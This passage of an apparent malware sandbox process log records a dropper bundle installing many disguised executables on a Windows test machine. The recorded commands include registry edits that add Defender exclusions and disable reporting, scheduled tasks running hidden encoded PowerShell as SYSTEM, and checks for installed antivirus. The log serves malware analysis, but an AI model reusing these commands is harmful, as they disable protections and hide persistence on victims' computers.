C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 832
3⤵
- Program crash
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 768
3⤵
- Program crash
PID:9156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 856
3⤵
- Program crash
PID:9764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 800
3⤵
- Program crash
PID:8752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 1380
3⤵
- Program crash
PID:10272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe"
3⤵
PID:10636

C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe"
4⤵
PID:11212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 1388
3⤵
- Program crash
PID:31568

C:\Users\Admin\Pictures\Adobe Films\CQNw9xZ0E089eWPXNdTQEPf4.exe
"C:\Users\Admin\Pictures\Adobe Films\CQNw9xZ0E089eWPXNdTQEPf4.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:4680

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:8484

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:8476

C:\Users\Admin\Documents\pvRHfez8EvdvK81njOaBQPgs.exe
"C:\Users\Admin\Documents\pvRHfez8EvdvK81njOaBQPgs.exe"
3⤵
PID:8468

C:\Users\Admin\Pictures\Adobe Films\FVIN5GEmuT3vBSesV3KN4pMp.exe
"C:\Users\Admin\Pictures\Adobe Films\FVIN5GEmuT3vBSesV3KN4pMp.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:8140

C:\Windows\SysWOW64\robocopy.exe
robocopy 8927387376487263745672673846276374982938486273568279384982384972834
5⤵
PID:9480

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Provide.accdt & ping -n 5 localhost
5⤵
PID:11828

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:9964

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
7⤵
- Enumerates processes with tasklist
PID:22320

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
7⤵
PID:22340

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
7⤵
- Enumerates processes with tasklist
PID:23904

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
7⤵
PID:23916

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^NpDypcc$" Corner.accdt
7⤵
PID:26148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Quite.exe.pif
Quite.exe.pif r
7⤵
PID:26756

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
7⤵
- Runs ping.exe
PID:26900

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:39240

C:\Users\Admin\Pictures\Adobe Films\rbSA3tUGFBdO0kRFgS_e15dr.exe
"C:\Users\Admin\Pictures\Adobe Films\rbSA3tUGFBdO0kRFgS_e15dr.exe"
4⤵
- Executes dropped EXE
PID:8928

C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
PID:9836

C:\Users\Admin\AppData\Local\Temp\7zS2035.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Enumerates system info in registry
PID:9408

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:8124

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:8992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:10396

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:10584

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:9032

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
- Modifies Windows Defender Real-time Protection settings
- Blocklisted process makes network request
- Executes dropped EXE
- Checks computer location settings
PID:8468

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:8548

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:764

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBCHzxKYH" /SC once /ST 06:21:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:10248

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBCHzxKYH"
7⤵
PID:10680

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBCHzxKYH"
7⤵
PID:11796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\RjLTsSc.exe\" d8 /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:12072

C:\Users\Admin\Pictures\Adobe Films\sjKDfCT2kSQ4YhWPHKOoLmSB.exe
"C:\Users\Admin\Pictures\Adobe Films\sjKDfCT2kSQ4YhWPHKOoLmSB.exe"
4⤵
- Executes dropped EXE
PID:8564

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8564 -s 476
5⤵
- Program crash
PID:10052

C:\Users\Admin\Pictures\Adobe Films\8dIv2siJec0bP7GeQg7IlcK8.exe
"C:\Users\Admin\Pictures\Adobe Films\8dIv2siJec0bP7GeQg7IlcK8.exe"
4⤵
- Executes dropped EXE
PID:9256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:4784

C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe
"C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8744

C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe
"C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"
5⤵
PID:10192

C:\Users\Admin\Pictures\Adobe Films\Cmw8lbMU1vbPEa32R4CNf5At.exe
"C:\Users\Admin\Pictures\Adobe Films\Cmw8lbMU1vbPEa32R4CNf5At.exe"
4⤵
- Executes dropped EXE
PID:9088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:11084

C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe
"C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
- Executes dropped EXE
PID:3540

C:\Users\Admin\AppData\Local\Temp\is-091EG.tmp\joDqge54Tv9NCgW49aAyCCam.tmp
"C:\Users\Admin\AppData\Local\Temp\is-091EG.tmp\joDqge54Tv9NCgW49aAyCCam.tmp" /SL5="$802C2,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:9600

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
6⤵
- Kills process with taskkill
PID:8292

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
6⤵
PID:10416

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
7⤵
PID:11140

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4cfb59221664617361 --downloadDate=2022-10-01T09:42:35 --distId=marketator --pid=747
6⤵
PID:10388

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-breadcrumb2" --initial-client-data=0x3fc,0x3c8,0x3cc,0x3d8,0x3d0,0x7ff6615fbc80,0x7ff6615fbca0,0x7ff6615fbcb8
7⤵
PID:10748

C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
7⤵
PID:10608

C:\Users\Admin\AppData\Local\Temp\is-E7HAS.tmp\AdblockInstaller.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E7HAS.tmp\AdblockInstaller.tmp" /SL5="$3037C,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
8⤵
PID:8244

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
7⤵
- Modifies Windows Firewall
PID:10640

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
7⤵
PID:11080

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
7⤵
PID:10252

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
6⤵
PID:8036

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
7⤵
- Modifies registry key
PID:11168

C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe
"C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:8676

C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe
"C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe" -h
5⤵
PID:9008

C:\Users\Admin\Pictures\Adobe Films\lIYgJh5oH3Gd4X2XvUv7TRQa.exe
"C:\Users\Admin\Pictures\Adobe Films\lIYgJh5oH3Gd4X2XvUv7TRQa.exe"
4⤵
- Executes dropped EXE
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 344
5⤵
- Program crash
PID:9056

C:\Users\Admin\Pictures\Adobe Films\aDP1V_OXS7NxUGwVfjDy2qub.exe
"C:\Users\Admin\Pictures\Adobe Films\aDP1V_OXS7NxUGwVfjDy2qub.exe"
4⤵
- Executes dropped EXE
PID:1704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:11408

C:\Users\Admin\Pictures\Adobe Films\eCZd8qB60HChZ6SA7X0pv44g.exe
"C:\Users\Admin\Pictures\Adobe Films\eCZd8qB60HChZ6SA7X0pv44g.exe"
4⤵
- Executes dropped EXE
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 456
5⤵
- Program crash
PID:8868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 788
5⤵
- Program crash
PID:10156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 808
5⤵
- Program crash
PID:9456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 868
5⤵
- Program crash
PID:10264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 876
5⤵
- Program crash
PID:10660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 1000
5⤵
- Program crash
PID:11096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 484
5⤵
- Program crash
PID:10316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 1380
5⤵
- Program crash
PID:10196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\koDH2aOKL\Cleaner.exe"
5⤵
PID:3788

C:\Users\Admin\AppData\Local\Temp\koDH2aOKL\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\koDH2aOKL\Cleaner.exe"
6⤵
PID:11492

C:\Users\Admin\Pictures\Adobe Films\9x8OVfskAh1tzPMjFGbDngp_.exe
"C:\Users\Admin\Pictures\Adobe Films\9x8OVfskAh1tzPMjFGbDngp_.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3380

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\Jh5GiS.YE2
5⤵
PID:9504

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\Jh5GiS.YE2
6⤵
- Loads dropped DLL
PID:9944

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\Jh5GiS.YE2
7⤵
PID:10692

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\Jh5GiS.YE2
8⤵
PID:10340

C:\Users\Admin\Pictures\Adobe Films\dgMH12V7VsD9dOAiKI30eTdv.exe
"C:\Users\Admin\Pictures\Adobe Films\dgMH12V7VsD9dOAiKI30eTdv.exe"
4⤵
- Executes dropped EXE
PID:4564

C:\Windows\system32\cmd.exe
cmd.exe /c "del C:\Users\Admin\Pictures\Adobe Films\dgMH12V7VsD9dOAiKI30eTdv.exe"
5⤵
PID:10128

C:\Users\Admin\Pictures\Adobe Films\ft04DOugAN_yRClQPKogVWyi.exe
"C:\Users\Admin\Pictures\Adobe Films\ft04DOugAN_yRClQPKogVWyi.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8504

C:\Users\Admin\Pictures\Adobe Films\qy5OACrqpThAbRcUslLBS_2g.exe
"C:\Users\Admin\Pictures\Adobe Films\qy5OACrqpThAbRcUslLBS_2g.exe"
4⤵
- Executes dropped EXE
PID:8972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:11432

C:\Users\Admin\Pictures\Adobe Films\cuD83qs50VUQxJty0Y9xkG8Q.exe
"C:\Users\Admin\Pictures\Adobe Films\cuD83qs50VUQxJty0Y9xkG8Q.exe"
4⤵
- Executes dropped EXE
PID:8904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
- Executes dropped EXE
PID:9008

C:\Users\Admin\Pictures\Adobe Films\nbM6uULZc4xl1P2c9Ubr3_tU.exe
"C:\Users\Admin\Pictures\Adobe Films\nbM6uULZc4xl1P2c9Ubr3_tU.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:412

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:8200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
4⤵
PID:9844

C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe
"C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe"
4⤵
PID:47800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
5⤵
PID:56172

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
4⤵
PID:49544

C:\Users\Admin\Pictures\Adobe Films\tllLHrgWRG_VlUzq1KDc4rKs.exe
"C:\Users\Admin\Pictures\Adobe Films\tllLHrgWRG_VlUzq1KDc4rKs.exe"
2⤵
- Executes dropped EXE
PID:1840

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1840 -s 476
3⤵
- Program crash
PID:2236

C:\Users\Admin\Pictures\Adobe Films\UoebYjish2W0eboo9MSvTsGU.exe
"C:\Users\Admin\Pictures\Adobe Films\UoebYjish2W0eboo9MSvTsGU.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:684

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\IvK5uicA.CPl",
3⤵
PID:3688

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\IvK5uicA.CPl",
4⤵
- Loads dropped DLL
PID:8024

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\IvK5uicA.CPl",
5⤵
PID:9320

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21ea78c748a30684.exe
Wed21ea78c748a30684.exe /mixtwo
1⤵
- Executes dropped EXE
PID:880

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214f6ccf7c811f9d.exe
Wed214f6ccf7c811f9d.exe
1⤵
- Executes dropped EXE
PID:4872

C:\Users\Admin\AppData\Local\Temp\is-IIBJR.tmp\Wed214f6ccf7c811f9d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IIBJR.tmp\Wed214f6ccf7c811f9d.tmp" /SL5="$801E4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214f6ccf7c811f9d.exe"
2⤵
- Executes dropped EXE
PID:3108

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214f6ccf7c811f9d.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214f6ccf7c811f9d.exe" /SILENT
3⤵
- Executes dropped EXE
PID:2172

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21852ed61e6a343.exe
Wed21852ed61e6a343.exe
1⤵
- Executes dropped EXE
PID:2876

C:\Users\Admin\AppData\Local\Temp\is-FCRB1.tmp\Wed21852ed61e6a343.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FCRB1.tmp\Wed21852ed61e6a343.tmp" /SL5="$3017C,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21852ed61e6a343.exe"
2⤵
- Executes dropped EXE
PID:4768

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2135bd1920.exe
Wed2135bd1920.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1212

C:\Users\Admin\AppData\Local\Temp\is-D4234.tmp\Wed214f6ccf7c811f9d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D4234.tmp\Wed214f6ccf7c811f9d.tmp" /SL5="$801B6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214f6ccf7c811f9d.exe" /SILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4432

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv rSJFR6IRIUGitiZufx5i+A.0.2
1⤵
PID:752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 1840 -ip 1840
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2548 -ip 2548
1⤵
PID:8016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2548 -ip 2548
1⤵
PID:8672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2548 -ip 2548
1⤵
PID:8980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2548 -ip 2548
1⤵
PID:8340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2548 -ip 2548
1⤵
PID:8920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2548 -ip 2548
1⤵
PID:9608

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 8564 -ip 8564
1⤵
PID:9792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1144 -ip 1144
1⤵
PID:9424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2548 -ip 2548
1⤵
PID:8984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4304 -ip 4304
1⤵
PID:8900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1144 -ip 1144
1⤵
PID:9996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1144 -ip 1144
1⤵
PID:2708

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\IvK5uicA.CPl",
1⤵
- Loads dropped DLL
PID:9796

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:8036

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 600
3⤵
- Program crash
PID:9028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 796 -ip 796
1⤵
PID:8168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1144 -ip 1144
1⤵
PID:9468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2548 -ip 2548
1⤵
PID:10216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1144 -ip 1144
1⤵
PID:10592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:10892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1144 -ip 1144
1⤵
PID:11024

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:10184

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:8292

C:\Windows\SysWOW64\WerFault.exe
